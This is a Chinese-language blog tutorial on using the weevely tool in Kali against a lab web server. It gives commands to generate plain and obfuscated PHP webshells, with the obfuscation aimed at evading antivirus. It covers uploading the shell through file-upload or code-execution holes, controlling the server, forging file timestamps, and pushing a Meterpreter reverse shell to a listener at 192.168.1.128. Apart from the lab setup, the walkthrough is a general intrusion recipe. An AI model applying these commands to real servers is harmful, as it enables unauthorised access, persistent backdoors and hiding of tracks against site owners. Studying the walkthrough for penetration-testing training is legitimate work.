![8173be48f49cb5dd44b0b7d8a5f89822.png](https://i-blog.csdnimg.cn/blog_migrate/0a0801e45ee050eca72d6818e555fc7a.jpeg)
目的 今天使用一下kali系统下的中国菜刀 weevely ,生成木马文件、混淆木马文件控制Web服务器,并进一步 反弹shell 给metasploit做进一步控制。 实验环境 VM搭建的虚拟测试环境
1.phpstudy搭建主机 192.168.1.1
2.kali 192.168.1.128 Weevely
介绍 weevely是一款使用python编写的webshell工具,很多说是linux下的中国菜刀,但只能用于PHP。 weevely在 linux 上使用非常给力,但是在windows上很多模块无法使用
![4cbab6aab88cce1e171280b7e82a5f5e.png](https://i-blog.csdnimg.cn/blog_migrate/5a66d81a5c342bb4edc4fc2c2d9db76b.png)
生成shell | wevely generate |
---|---|
连接shell | weevely [cmd] |
生成混淆shell | weevely generate -obfuscator |
使用weevely生成php木马文件
weevely generate XG ~/shell.php
![88f95bca46a6e4419f3081ae4ef7bdf2.png](https://i-blog.csdnimg.cn/blog_migrate/2199397da5ee5dd5a20c6307f107d632.png)
上面生成的是 普通木马 文件,下面生成的是基于weevely模板生成的 混淆木马 ,起到一定的 防查杀 作用 (实际作用不大,照样能被腾讯、360全家桶扫出来。)
![b500c18d9bfcdd2bcf37e4808f0e92ff.png](https://i-blog.csdnimg.cn/blog_migrate/d5780ebdc7c5a841f02f1bad3fb1f75a.png)
weevely generate -obfuscator cleartext1_php XG shell2.php
![1c47117f334dd651111b44cce63af760.png](https://i-blog.csdnimg.cn/blog_migrate/420084b356e02b642579f54eb79da3e2.png)
将木马文件上传到被攻击web服务器
这里的上传过程看你要攻击的站点了,有文件上传漏洞,代码执行等等,反正能把木马文件上传到web目录下就行。并要知道木马所在的文件目录。
由于是我自己搭建的web,就直接拖拽进去了。开启phpstudy。
![d7e1e6f66974b0a1fd93a9ac20131e48.png](https://i-blog.csdnimg.cn/blog_migrate/9f7a64271e62457ffd26cfb1591142af.png)
![dac22822ca337382cbfac0cefb5009c1.png](https://i-blog.csdnimg.cn/blog_migrate/1210c3617029ee4102f09f3d85678ed2.png)
然后复制url链接
![dc8d264a7902d87964f9b39120d1867f.png](https://i-blog.csdnimg.cn/blog_migrate/4baccc8e00a757c9fa69dfb47189b3ac.png)
使用weevely连接木马文件
weevely http://192.168.1.1/shell/shell.php XG
![4ad03b923dbbe41c28eeac6390322a16.png](https://i-blog.csdnimg.cn/blog_migrate/a3e81c8d44aa85d13b830e3d15558adb.png)
![cc37227b6ae33b25e26e0cd7f2cbfe21.png](https://i-blog.csdnimg.cn/blog_migrate/178b343e1bc301249bd234f9b3e6d500.png)
![efc6284326d4040dfe2ae3c3968b5c92.png](https://i-blog.csdnimg.cn/blog_migrate/1390de83e254cde61ccd2bf49adf7815.png)
控制参数
连接上shell就相当于控制服务器了,可以在weevely状态下发?来查看可以使用的命令,这里列出几个常用命令。
信息搜集::system_info收集系统信息:system_info -info client_ip whoami hostname查找自己连接的ip文件管理:file_touch 修改文件时间:file_touch -human-ts '2018-09-15 200:41:20' 文件名命令执行:shell_php 执行PHP命令:shell_php system('dir');
反向shell连接msf
连接上的weevely功能虽然很强大了,但是不要忘了更强的神器metasploit,我们可以使用weevely转发到msf进而最深度的控制服务器。
在这使用:backdoor_meterpreter参数
weevely>:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 192.168.1.128 -port 4444
:backdoor_meterpreter | 反向shell |
---|---|
-payload php/meterpreter/reverse_tcp | 是搭载的攻击载荷 |
-lhost | 转发给监听的ip地址 |
-port | 就是监听端口了 |
转发完成,接下来就是打开msf使用监听模块监听,获取控制权
use exploit/multi/handlershow payloadsset payload php/meterpreter/reverse_tcpset Lhost 192.168.1.128
最后run一下就可以监听到,并进一步控制web服务器了。
总结
weevely用起来也算是菜刀的一种变形,但是搭配起msf可以说是无敌的存在。
weevely在Linux下使用很友好,但在windows下还是使用菜刀,蚁剑和冰蝎吧。
msf控制后的使用命令特别特别多,功能特别强大,所以说msf是渗透神器嘛。(提醒一下,真正进行渗透时的ip地址,要么两个主机在同一个内网网段,要么在同一个公网,不然连接不上。)